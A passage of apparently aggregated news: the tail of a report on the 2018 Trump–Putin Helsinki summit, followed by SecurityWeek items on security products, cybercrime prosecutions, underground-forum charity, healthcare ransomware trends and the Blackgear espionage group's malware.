In his own interview with Fox, Trump said he was "fascinated" by an offer from Putin for US agents to indirectly grill the indicted Russians by submitting their questions to Russian officials but said Mueller's team "probably won't want to go" to Moscow.

- 'Never interfered' -

Trump again denied any collusion between his campaign and the Kremlin, while Putin insisted: "The Russian state has never interfered and is not planning to interfere in the USA's internal affairs."

As criticism mounted, Trump tweeted from Air Force One on his way home from Finland that he had "GREAT confidence in MY intelligence people".

"However, I also recognize that in order to build a brighter future, we cannot exclusively focus on the past – as the world’s two largest nuclear powers, we must get along."

Angry criticism of his disavowal of his own intelligence agencies came even from within Trump's Republican Party.

Senior Republican Senator John McCain was particularly scathing, saying: "Coming close on the heels of President Trump's bombastic and erratic conduct towards our closest friends and allies in Brussels and Britain, today's press conference marks a recent low point in the history of the American presidency."

Director of National Intelligence Dan Coats distanced himself from his boss, issuing a statement saying the US intelligence community's judgment that Russia interfered in the 2016 election was "clear".

But the top Democrat in the US Senate, Chuck Schumer, tweeted that many Americans can only wonder if "the only possible explanation for this dangerous behaviour is the possibility that President Putin holds damaging information over President Trump."

And former CIA director John Brennan said Trump's behavior at the news conference "rises to & exceeds the threshold of 'high crimes & misdemeanors.' It was nothing short of treasonous."

Putin denied the notion that Russian spy bosses may hold compromising information on Trump, who in his previous business career oversaw the Miss Universe pageant in Moscow in 2013.

"Please get this rubbish out of your heads," the Russian leader said.

In a post-summit interview with Fox News, Putin said US-Russia relations should not be held "hostage" to "internal political games," referring to the Mueller probe.

The two leaders appeared relaxed at the Helsinki news conference, smiling on occasion, in contrast to their sombre demeanour at the start of the day.

Trump, bent on forging a personal bond with the Kremlin chief despite the election allegations, went into the summit blaming the "stupidity" of his predecessors for plunging ties to their present low.

His manner towards Putin was also a contrast to the anger Trump flashed at NATO allies at a combative summit of the alliance in Brussels last week, which critics said would only hearten Putin.

- 'Only the beginning' -

A post-NATO trip to Britain, supposedly America's partner in a "special relationship", was riddled with controversy as well.

In Helsinki, however, Trump was determined to accentuate the positive, as was Putin.

The two leaders met one-on-one for more than two hours, with just their interpreters present, before they were joined by their national security teams.

Many in Washington were agog at Trump's decision to sit alone with Putin, worried about what he might give away to the former KGB spymaster, after previously cosying up to the autocratic leaders of China and North Korea.

But Trump, convinced his unique brand of diplomacy can win over Putin, pressed ahead and looked forward to "having an extraordinary relationship" as the pair sat down to discuss global hotspots.

- 'Foolishness and stupidity' -

Trump began the day by firing a Twitter broadside at his domestic opponents, blaming the diplomatic chill on the election investigation.

"Our relationship with Russia has NEVER been worse thanks to many years of U.S. foolishness and stupidity and now, the Rigged Witch Hunt!" Trump tweeted.

Russia's foreign ministry tweeted in response: "We agree."

In a weekend interview with CBS News, Trump admitted that Russia remains a foe, but he put Moscow on a par with China and the European Union as economic and diplomatic rivals.

Symantec Launches Email Threat Isolation Solution
19.7.2018 securityweek IT

Symantec on Tuesday unveiled a new solution designed to help protect enterprises against email-based attacks using threat isolation.

According to the security firm, the new Email Threat Isolation technology can block advanced email attacks, including spear phishing, credential theft and account takeover attempts, and ransomware.

The solution creates what Symantec describes as a secure remote execution environment between the user and the potentially malicious content.

Specifically, Email Threat Isolation sends traffic from the links included in suspicious emails to this secure environment. All potentially malicious elements remain confined in this isolated environment while the user is only shown a safe visual representation of the content.

The solution can also render websites in read-only mode, which helps prevent employees from entering sensitive information, such as corporate credentials, on a phishing website.

Email Threat Isolation is available as a cloud-based or on-premises service, and it can be used with Symantec Email Security or third-party email security solutions.

“Despite significant efforts by our industry to detect and block email-borne threats, messaging remains the primary vector for malware and scams within the enterprise. The industry requires a paradigm shift to properly secure messaging, and we are excited to be bringing the innovation of integrated isolation technology to email,” said Greg Clark, CEO of Symantec.

“This revolutionary technology helps enterprises to quickly and easily isolate all malicious email content – both internal and external – to substantially reduce inherent risks within messaging applications. Further, because the technology is cloud-based, organizations can be up and running quickly and easily, reducing stress on already taxed IT teams,” Clark added.

Security Instrumentation Firm Verodin Raises $21 Million
19.7.2018 securityweek IT

Verodin, a Virginia-based company that helps organizations assess the effectiveness of their cybersecurity controls, on Tuesday announced that it has raised $21 million in a Series B funding round.

The round was led by TenEleven Ventures and Bessemer Venture Partners (BVP), with participation from Capital One Growth Ventures, Citi Ventures and all existing investors. As part of the deal, TenEleven Ventures founder Mark Hatfield will join the company’s board of directors.

The company says it will use the funds to continue the development of its Security Instrumentation Platform (SIP), increase hiring in all functional areas, and expand global sales.

“Boards and C-level executives increasingly want evidence that the dollars and effort they spend on cyber defenses are actually working,” said TenEleven Ventures’ Hatfield. “Verodin is leading a revolutionary shift in cybersecurity, delivering organizations the evidence they need to measure, manage and improve their cybersecurity effectiveness.”

The latest funding round brings the total raised by Verodin to $34 million. The company secured $10 million in a Series A funding round in June 2016.

While the Series B round was officially announced only on Tuesday, the funding was actually revealed in late June when a SEC filing showed that the company had raised roughly $20.7 million from 14 investors. The company refused to make any comments at the time.

Verodin SIP is deployed in an organization’s IT environment and it continuously tests the effectiveness of endpoint, cloud, email and network controls. The solution helps enterprises ensure that the products they have purchased and deployed are actually protecting business-critical assets.

Irish Silk Road Suspect Extradited to US: Prosecutors
19.7.2018 securityweek BigBrothers

A 30-year-old Irish man accused of working for now defunct "dark web" marketplace Silk Road has been extradited to the United States to face charges in New York, four years after his arrest, prosecutors announced Friday.

Gary Davis, who went by the alias "Libertas," was allegedly a Silk Road administrator in 2013 -- and was paid a weekly salary to carry out duties that included resolving disputes between drug dealers and buyers on the site.

He is charged with one count of conspiracy to distribute narcotics, which carries a maximum sentence of life in prison, one count of conspiracy to commit computer intrusion and one count of conspiracy to commit money laundering.

The Wicklow man, who was arrested in January 2014, appeared before a Manhattan federal court on Friday.

"Thanks to our partner agencies here and abroad, Davis now faces justice in an American court," said Manhattan US Attorney Geoffrey Berman.

Until the FBI shut it down in October 2013, the US government called Silk Road "the most sophisticated and extensive criminal marketplace on the Internet" used by vendors in more than 10 countries in North America and Europe.

Texan mastermind Ross Ulbricht was convicted and sentenced to life in prison in 2015 for running the online enterprise that sold $200 million in drugs worldwide.

Operating under the alias "Dread Pirate Roberts," Ulbricht amassed $13 million in commissions by making the purchase of heroin, cocaine and crystal meth as easy as shopping online at eBay or Amazon, the government said.

His four-week trial was considered a landmark case in the murky world of online crime and government surveillance.

Charitable Hackers Collaborate in Deep Web Forums
19.7.2018 securityweek Hacking

Through Multiple Methods and Collaborations, Many Hackers Donate Money to Good Causes

Sun Tzu is a cliche in cybersecurity, but no less valid for that. He wrote, "If you know the enemy and know yourself, you need not fear the result of a hundred battles." Security researchers infiltrate the deep web forums to understand both the enemy and his weapons -- and sometimes they can be surprised by what they find.

Last month, Trustwave's SpiderLabs blog posted a discussion on the cybercriminal members of underground forums with the title, 'Underground Code of Honor'. In this blog is brief mention of hackers' charitable works. Now Ziv Mador, VP of security research at Trustwave, has given SecurityWeek more details of a well-organized charitable element found in numerous deep web forums.

He explained that Trustwave was investigating the modular structure of the underground. Different groups specialize in specific aspects of cybercrime and sell their products or services to other groups. One group might specialize in running botnets and botnet servers. Another might specialize in developing malware -- and each might sell their services to the other to meet a specific demand.

During this research, the researchers came across charity-themed communications, and decided to investigate further. "And the more we delved," said Mador, "the more fascinating it became. We found that through multiple methods and collaborations these hackers actually donate a lot of money to good causes." The most frequent donations, he said, are for orphanages and hospitals (especially children's hospitals).

Trustwave particularly looked at three different forums: two Russian-speaking and one English-speaking. There were immediate differences. In the English-speaking forum, charitable donations tended to be from individuals. In the Russian-speaking forums they were collaborative campaigns. This could be partly cultural (individualism versus team working) or partly economic (eastern European hackers really needing to collaborate in order to collect sufficient funds).

Whatever the reasons, however, the Russian-speaking hackers have developed relatively sophisticated 'giving campaigns'. "Near the Russian new year (7 January), they ran a campaign and used the money raised to buy equipment for hospitals and supplies for orphanages." The hospital equipment included stretchers, inhalers, and bacteria-killing lamps. They even have plans to buy heart-rate monitors, and are working with a contractor to remodel a particular department in one particular hospital.

The orphanage supplies included toiletries such as hair brushes, tooth brushes and toothpaste. With money left over, they bought 25 kilos of fresh fruit, since 'sweets are not healthy for the kids'. These supplies were delivered by hand (about 15 bags full), and photographic evidence of the hand-over, and the kids, was posted as proof to the forum.

If all this seems just a little bit 'Robin Hood', it's a comparison not lost on the hackers themselves. "Anyone can become a modern Robin Hood" one hacker posted to the forum. But perhaps the most intriguing charitable act has been the development of a 'needy support' capability. "They have established a process in one of the forums," explained Mador, "where parents of children who are sick and the families are poor, can submit a request for support. So, if a child needs some medication or surgery and the parents cannot pay for it, they can submit a request for support with supporting documents -- and there is a very specific post in one of the underground forums specifying exactly what documents are needed to get support from the forum."

It's not just the members that get involved. One forum promises to donate half the money it collects to the charitable work. It gets this from two primary sources -- using the forum for advertising; and through arbitration services. "If two forum members get into conflict," said Mador; "let's say one bought a service from another one, and promises were not fulfilled, they go to arbitration. Here the forum administrator will work with them to decide on who is right and who is wrong; and to determine any compensation. Part of that compensation goes to the arbitration fund -- and part of that goes to charity."

One of the forums publishes a list of donors and amounts. The names are obviously false or online handles -- but some individuals can still be recognized. Petr Severa donated more than $100. He is now better known as Peter Yuryevich Levashov, after being arrested while holidaying in Spain and extradited to the U.S. He is now awaiting trial in Connecticut on eight charges, and faces 50 years in jail.

As the cybercriminals' charitable work grows, so too does a need for improved administration. "In one of the forums," said Mador, "it was suggested that since this charitable work takes time and effort, it needed a manager to manage the whole process. It was further suggested that they should hire a woman -- and it specifically had to be a woman -- to manage the funds. They also mentioned that their 'punchers' would check the candidates' information." Punchers are people in the criminal underground who have expertise in getting confidential information about people -- so the candidates should expect a pretty invasive background check on their credentials.

The picture painted really is one of the romantic Robin Hood idea: robbing the rich to pay the poor. Mador doesn't accept this, finding the situation to be more ironic than romantic. It would take an analysis by psychologists and sociologists to understand the causes and motives behind the rise of underground charitable work; but Mador does concede that there may be an element of cultural patriotism among some of the Russian and eastern European hackers.

Ilia Kolochenko, CEO of High-Tech Bridge, sees nothing attractive in the phenomenon -- he finds it alarming and an indication of a growing breakdown in government authority and increasing anarchy. "The substance of the charity is certainly laudable and justified. However," he told SecurityWeek, "it also serves as a harbinger of the global cybersecurity crisis. Governments and law authorities are unable to protect their citizens in the digital space anymore. Cybercriminals are undermining governmental authority by helping indigent people abandoned by the state. What will be the next? Cybercriminals offering private protection in the digital space for a reasonable cost affordable to the citizens? Governments will lose their authority and power, and Robin Hoods will reign."

Chicago-based data security and compliance solutions firm Trustwave was acquired by Singapore Telecommunications (Singtel) for $810 million in cash in April 2015.

Downward Trend in Healthcare Ransomware Attacks May be Temporary
19.7.2018 securityweek 

Confirming a trend noted by other researchers, a new report from network security firm Cryptonite notes that ransomware incidents have declined over the last six months.

Cryptonite's Healthcare Cyber Research Report (H1, 2018) draws its conclusions from an analysis of 'IT/Hacking' incidents reported to the Health and Human Services Office of Civil Rights (HHS/OCR) between January 1, 2018 and June 30, 2018, supplemented by its own research.

The report (PDF) notes that ransomware events impacting more than 500 patient data records dropped from 19 in the first half of 2017 to eight in the first half of 2018 -- a decrease of 57%. At the same time, however, the number of patient records (ePHI) breached in the first half of 2018 has increased from 1,674,793 in the first half of 2017 to 1,928,432 in the first half of 2018.

The implication is that while ransomware is not currently either the most favored or most successful method of attacking the healthcare industry, the attraction of patient record data is as strong as ever.

"Medical records," explains the report, "are prime targets, as this data is highly prized to support identity theft and financial fraud. Medical records are an attractive commodity on the dark web where they demand high premiums from criminal purchasers."

Cryptonite believes that one of the reasons for the decline in ransomware is general improvements in healthcare security. "Customers have started to add micro-segmentation to networks, as well as specialized software to address ransomware threats. In general, in the largest hospitals, new Zero Trust technologies have been added to the existing mix of defense in depth technologies to expand and harden the defensive perimeters."

However, it suspects that this may be only a temporary respite. "We do believe that ransomware still presents a formidable threat to healthcare and expect new variants, such as AI based malware, to present very difficult challenges to healthcare institutions later in 2018 and into 2019."

At the beginning of 2018, MIT Technology Review published 'Six Cyber Threats to Really Worry About in 2018'. One of these is the weaponization of artificial intelligence. Hackers, it suggested, are "likely to use AI to help design malware that's even better at fooling 'sandboxes', or security programs that try to spot rogue code before it is deployed in companies' systems."

It is the potential weaponization of AI to support ransomware that Cryptonite feels might fuel a resurgence of ransomware attacks over the next year.

In the meantime, Britton White, security & HIPAA compliance advisor at Fortified Health Security, fears that any reported decline in ransomware is likely to give a false sense of optimism -- and potentially lead healthcare organizations to relax their vigilance. "I've not seen anyone address ransomware in their security training and awareness program or disaster recovery plan," he told SecurityWeek. "In the state of Tennessee just two weeks ago, a breach notice was sent out to thousands of people due to a local Memphis organization getting hit with ransomware. Adding to it, they're a business associate to a number of major hospitals in the area, so they had to be notified as well. It's a huge mess."

While the number of ransomware attacks has decreased over last year, the number of breached patient records has grown from 1,767,955 in the second half of 2017 to 1,928,432 in the first half of 2018 -- an increase of 9.08%. "The positive trend in reduction of the use of ransomware is overshadowed by the continued high volume of major attacks," says Cryptonite. "Healthcare insurers, hospitals... and a broad variety of other important health entities such as surgical centers, skilled nursing facilities, urology centers, vision surgical centers, cancer treatment centers, MRI/CT-scan centers and diagnostic laboratories fall victim to these attacks every month."

But White points out that these statistics are official numbers only. "Bottom line is, ransomware continues to be a huge problem for all healthcare organizations. How many healthcare organizations haven't reported being hit with ransomware? I'd imagine they'd prefer to remain off the radar as much as possible," he told SecurityWeek. "Everyone needs to remain vigilant and ensure they have the ability to recover as quickly as possible if/when they get hit."

Rockville, Maryland-based Cryptonite emerged from stealth mode in October 2017. A spin-off of Maryland defense contractor Intelligent Automation (IAI), Cryptonite is led by President and CEO Michael Simon, and Justin Yackoski, CTO and former lead researcher at IAI.

'Blackgear' Cyberspies Resurface With New Tools, Techniques
19.7.2018 securityweek CyberSpy

The hackers behind a cyberespionage campaign known as Blackgear are back with improved malware that abuses social media websites, including Facebook, for command and control (C&C) communications.

The threat group, also known as Topgear and Comnie, has been around since at least 2008, mainly targeting entities in Taiwan, South Korea and Japan. Its targets include organizations in the telecommunications, defense, government, aerospace, and high-tech sectors. Some limited evidence suggests that the attacks may be conducted by Chinese state-sponsored actors.

Previous Blackgear attacks involved malware tracked as Elirks and Protux, which the hackers created themselves. The latest attacks, analyzed by Trend Micro, relied on a new version of the Protux backdoor and a downloader named Marade.

One interesting technique leveraged by the threat group involves using blogs and social media websites for C&C communications, which helps it easily change C&C servers and improve its chances of evading detection. In the past, the actor posted encrypted C&C configurations on websites such as github.com, tumblr.com and blogspot.com. The more recent attacks also abuse Facebook to store and retrieve C&C data.

Blackgear malware abuses Facebook for C&C communications

The more recent attacks start with an email delivering a fake installer or decoy document, which drops the Marade downloader. The downloader is placed in a file whose size exceeds 50 Mb in an effort to bypass traditional sandbox products.

Marade checks the infected system for an antivirus solution and retrieves C&C data from a blog or social media post. If the compromised machine is of interest, the Protux backdoor is downloaded.

Protux allows the attackers to list all the files, processes, services and registries on the compromised host, along with taking screenshots and creating a shell that provides access to the system.

“Blackgear has been targeting various industries since its emergence a decade ago. Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions,” Trend Micro researchers explained. “For instance, Blackgear employs two stages of infection for each of its attacks. The potential victim may not be able to notice the intrusions as the first stage involves only profiling and reconnaissance. And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.”

Researchers have also stumbled upon a tool that provides the user interface from which the hackers control the Protux and Marade malware.

“Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors,” experts noted.

Malware Creator Admits to Building and Selling LuminosityLink RAT
19.7.2018 securityweek 

A Kentucky man admitted in a U.S. court to developing and distributing the remote access Trojan known as LuminosityLink.

21-year-old Colton Ray Grubbs of Stanford, Kentucky, pleaded guilty to developing the malware and selling it to thousands of people, knowing it would be used for computer intrusion, according to court documents.

Also known as Luminosity, the LuminosityLink RAT was first spotted in April 2015, providing its users with surveillance capabilities such as remote desktop and webcam and microphone access; a smart keylogger that could target specific programs; a crypto-currency miner; and distributed denial of service (DDoS) features.

In early February 2018, Europol and the UK’s National Crime Agency (NCA) announced an operation specifically targeting the sellers and users of Luminosity, but security researchers revealed soon after that the malware itself had been retired for over half a year.

According to the plea agreement obtained by investigative journalist Brian Krebs (PDF), Grubbs, who used the online handle of KFC Watermelon, admitted to having designed and sold LuminosityLink at $39.99 to over 6,000 customers between April 2015 and July 2017.

The malware was being distributed via the luminosity.link website and through the HackForums.net forum. Although he claimed the tool had legitimate purposes, being designed for system administration, the developer was touting capabilities that would allow potential customers to access and control systems without the legitimate owners’ knowledge or permissions.

According to the document filed in court, the hacker emphasized that the malware could be installed remotely without notification, as well as its keylogging and surveillance capabilities, file exfiltration functionality, the ability to steal login credentials, crypto-mining and DDoS features, and the ability to prevent detection and removal attempts from anti-malware software.

The document also claims that Grubbs was offering free support to customers, sending private messages to respond to “questions about accessing and controlling victim computers without authorization or detection.” He also admitted to recruiting other people to sell the malware as affiliates.

In July 2017, after learning the Federal Bureau of Investigation would raid his apartment, Grubbs warned the PayPal user who was collecting LuminosityLink payments, asked his roommate to hide a laptop in his car, and also concealed a debit card associated with his Bitcoin account and a phone storing his Bitcoin information.

“Defendant removed the hard drives from his desktop computer and removed them from his apartment before the authorized search so that they would not be seized by the government. Three days later, Defendant transferred over 114 bitcoin from his LuminosityLink bitcoin address into six new bitcoin addresses,” the plea agreement reads.

Overall, the hacker pleaded guilty to three counts, two of which carry maximum sentences of 5 years in prison and a fine of up to $250,000 each, while the third carries a maximum sentence of 20 years in prison and a fine of no more than $500,000.